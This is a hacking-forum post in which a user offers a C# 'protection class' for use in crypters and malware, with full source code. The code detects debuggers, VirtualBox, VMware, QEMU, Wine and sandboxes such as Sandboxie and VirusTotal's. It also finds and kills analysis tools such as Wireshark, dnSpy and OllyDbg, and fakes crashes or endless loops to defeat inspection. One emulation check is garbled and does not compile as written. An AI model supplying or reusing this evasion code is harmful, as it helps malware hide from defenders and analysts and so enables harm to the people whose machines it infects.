dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 32
- Reaction score
- 45,552
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
Here's a big protection class I assembled with some sources from the internet and some I wrote myself, it features:
Anti-debugging (.NET/Win32 API/Olly)
Basic anti-emulation
Anti-VM (Virtual Machine) several techniques
Anti-Sandbox (several, including VirusTotal's own)
It requires the following imports:
System.Management
System.Windows.Forms
Here's how you use it in your crypter/malware:
[HIDE-THANKS][LENGUAJE=C#]
[/LENGUAJE][/HIDE-THANKS]
Module Protection.cs
[HIDE-THANKS][LENGUAJE=C#]
[/LENGUAJE][/HIDE-THANKS]
Anti-debugging (.NET/Win32 API/Olly)
Basic anti-emulation
Anti-VM (Virtual Machine) several techniques
Anti-Sandbox (several, including VirusTotal's own)
It requires the following imports:
System.Management
System.Windows.Forms
Here's how you use it in your crypter/malware:
[HIDE-THANKS][LENGUAJE=C#]
Code:
>using System;
using System.IO;
namespace protectiontest
{
class Program
{
private static ProtectionSettings settings = new ProtectionSettings() {
VirtualMachine = true,
Debugging = true,
Emulation = true,
Sandbox = true,
Snooping = true,
Check_Timeout = 1000,
};
private static Protection protection = new Protection(settings);
static void Main(string[] args)
{
if (!protection.Running)
{
protection.Start();
}
//if we detected something, the following code would be unreachable
File.WriteAllText("running.txt", "hello world");
Console.WriteLine("My app");
Console.Read();
}
}
}Module Protection.cs
[HIDE-THANKS][LENGUAJE=C#]
Code:
>using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using System.Windows.Forms;
public class ProtectionSettings
{
public int Check_Timeout = 1000;
public bool VirtualMachine;
public bool Debugging;
public bool Emulation;
public bool Snooping;
public bool Sandbox;
public string[] Snooper_Titles = new string[] { "wireshark", "ilspy", "dnspy", "ollydbg", "de4dot", "megadumper" };
}
public class Protection
{
private ProtectionSettings _settings;
public ProtectionSettings Settings
{
get { return _settings; }
set { _settings = value; }
}
private bool _running = false;
#region Threads
private Thread AntiDebuggingThread;
private Thread AntiSnooperThread;
#endregion
#region API
[DllImport("Kernel32.dll", SetLastError = true, ExactSpelling = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, [MarshalAs(UnmanagedType.Bool)]ref bool isDebuggerPresent);
[DllImport("kernel32.dll")]
private static extern bool IsDebuggerPresent();
[DllImport("kernel32.dll")]
private static extern IntPtr GetModuleHandle(string module);
[DllImport("user32.dll", SetLastError = true)]
private static extern IntPtr FindWindow(string lpClassName, IntPtr ZeroOnly);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern uint GetFileAttributes(string lpFileName);
#endregion
public bool Running
{
get { return _running; }
set { _running = value; }
}
public Protection(ProtectionSettings settings)
{
this.Settings = settings;
}
public void Start()
{
if (Running) return;
//Do one time checks
if(Settings.VirtualMachine)
{
if(isProcessVirtualized())
{
spoofCrash();
}
}
if (Settings.Debugging)
{
if (isDebugged())
{
endlessLoop(); //endless loop on first check, but crash if we're on thread (somebody attached a debugger while running)
}
}
if (Settings.Sandbox)
{
if (isProcessInSandbox(Application.ExecutablePath))
{
spoofCrash();
}
}
if(Settings.Emulation )
{
if(isEmulated())
{
endlessLoop();
}
}
if (Settings.Snooping)
{
checkSnooping();
}
//Start continous checks
AntiDebuggingThread = new Thread(debuggerThread);
AntiDebuggingThread.Start();
AntiSnooperThread = new Thread(snooperThread);
AntiSnooperThread.Start();
Running = true;
}
public void Stop()
{
if (!Running) return;
if (AntiDebuggingThread != null)
{
AntiDebuggingThread = null;
}
if (AntiSnooperThread != null)
{
AntiSnooperThread = null;
}
Running = false;
}
#region ProtectionMethods
private void spoofCrash()
{
GC.Collect();
Environment.FailFast(null);
}
private void endlessLoop() //simple but undetected by malwr.com and virustotal
{
Application.Run();
}
#endregion
#region Checks
private bool isDebugged()
{
bool flag = false;
//Managed
if (Debugger.IsAttached) flag = true;
if (Debugger.IsLogging()) flag = true;
//Unmanaged
bool remotedbg = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref remotedbg);
if (remotedbg) flag = true;
if (IsDebuggerPresent()) flag = true;
if (flag)
{
Debug.Print("Debugger detected, eternal loop");
}
return flag;
}
private bool isProcessInSandbox(string startupPath)
{
if ((int)GetModuleHandle("SbieDLL.dll") != 0)
return true;
if (Process.GetCurrentProcess().ProcessName == "mlwr_smpl")
return true;
if (Environment.MachineName.StartsWith("placehol-"))
return true;
switch (WindowsIdentity.GetCurrent().Name.ToString().ToUpper())
{
case "USER": return true;
case "SANDBOX": return true;
case "VIRUS": return true;
case "MALWARE": return true;
case "SCHMIDTI": return true;
case "CURRENTUSER": return true;
}
string sPath = startupPath.ToUpper();
if (sPath == "C:\\FILE.EXE")
return true;
if (sPath.Contains("\\VIRUS"))
return true;
if (sPath.Contains("SANDBOX"))
return true;
if (sPath.Contains("SAMPLE"))
return true;
if ((int)FindWindow("Afx:400000:0", (IntPtr)0) != 0)
return true;
return false;
}
private bool isEmulated()
{
long tickCount = Environment.TickCount;
Thread.Sleep(500);
long tickCount2 = Environment.TickCount;
if (((tickCount2 - tickCount) {
return true;
}
return false;
}
private bool isProcessVirtualized()
{
if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VBOX")) { return true; }
if (readRegistryKey("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VBOX")) { return true; }
if (readRegistryKey("HARDWARE\\Description\\System", "VideoBiosVersion").ToUpper().Contains("VIRTUALBOX")) { return true; }
if (readRegistryKey("SOFTWARE\\Oracle\\VirtualBox Guest Additions", "") == "noValueButYesKey") { return true; }
if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\VBoxMouse.sys") != (uint)4294967295) { return true; }
if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; }
if (readRegistryKey("SOFTWARE\\VMware, Inc.\\VMware Tools", "") == "noValueButYesKey") { return true; }
if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; }
if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; }
if (readRegistryKey("SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0").ToUpper().Contains("vmware".ToUpper())) { return true; }
if (readRegistryKey("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", "DriverDesc").ToUpper().Contains("VMWARE")) { return true; }
if (readRegistryKey("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings", "Device Description").ToUpper().Contains("VMWARE")) { return true; }
if (readRegistryKey("SOFTWARE\\VMware, Inc.\\VMware Tools", "InstallPath").ToUpper().Contains("C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS")) { return true; }
if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmmouse.sys") != (uint)4294967295) { return true; }
if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmhgfs.sys") != (uint)4294967295) { return true; }
if (GetProcAddress((IntPtr)GetModuleHandle("kernel32.dll"), "wine_get_unix_file_name") != (IntPtr)0) { return true; }
if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("QEMU")) { return true; }
if (readRegistryKey("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("QEMU")) { return true; }
ManagementScope scope = new ManagementScope("\\\\.\\ROOT\\cimv2");
ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_VideoController");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query);
ManagementObjectCollection queryCollection = searcher.Get();
foreach (ManagementObject m in queryCollection)
{
if (m["Description"].ToString() == "VM Additions S3 Trio32/64") { return true; }
if (m["Description"].ToString() == "S3 Trio32/64") { return true; }
if (m["Description"].ToString() == "VirtualBox Graphics Adapter") { return true; }
if (m["Description"].ToString() == "VMware SVGA II") { return true; }
if (m["Description"].ToString().ToUpper().Contains("VMWARE")) { return true; }
if (m["Description"].ToString() == "") { return true; }
}
return false;
}
private string readRegistryKey(string key, string value)
{
RegistryKey registryKey;
registryKey = Registry.LocalMachine.OpenSubKey(key, false);
if (registryKey != null)
{
object rkey = registryKey.GetValue(value, (object)(string)"noValueButYesKey");
if (rkey.GetType() == typeof(string))
{
return rkey.ToString();
}
if (registryKey.GetValueKind(value) == RegistryValueKind.String || registryKey.GetValueKind(value) == RegistryValueKind.ExpandString)
{
return rkey.ToString();
}
if (registryKey.GetValueKind(value) == RegistryValueKind.DWord)
{
return Convert.ToString((Int32)rkey);
}
if (registryKey.GetValueKind(value) == RegistryValueKind.QWord)
{
return Convert.ToString((Int64)rkey);
}
if (registryKey.GetValueKind(value) == RegistryValueKind.Binary)
{
return Convert.ToString((byte[])rkey);
}
if (registryKey.GetValueKind(value) == RegistryValueKind.MultiString)
{
return string.Join("", (string[])rkey);
}
return "noValueButYesKey";
}
return "noKey";
}
private void checkSnooping()
{
foreach (Process process in Process.GetProcesses())
{
string fixedname = process.MainWindowTitle.ToLower().Trim();
foreach (string name in Settings.Snooper_Titles)
{
if (fixedname.Contains(name))
{
try
{
process.Kill();
Debug.Print("Snooper process found and killed");
}
catch (Exception ex) //We couldn't kill it, crash the app to prevent snooping
{ //Todo: check if the app was already killed? and if that was the reason why we got exception
//Then there's no need to crash
spoofCrash();
}
}
}
}
}
private void snooperThread()
{
while (Settings.Snooping)
{
checkSnooping();
Thread.Sleep(Settings.Check_Timeout);
}
}
private void debuggerThread()
{
while (Settings.Debugging)
{
if (isDebugged())
{
spoofCrash();
}
Thread.Sleep(Settings.Check_Timeout);
}
}
#endregion
}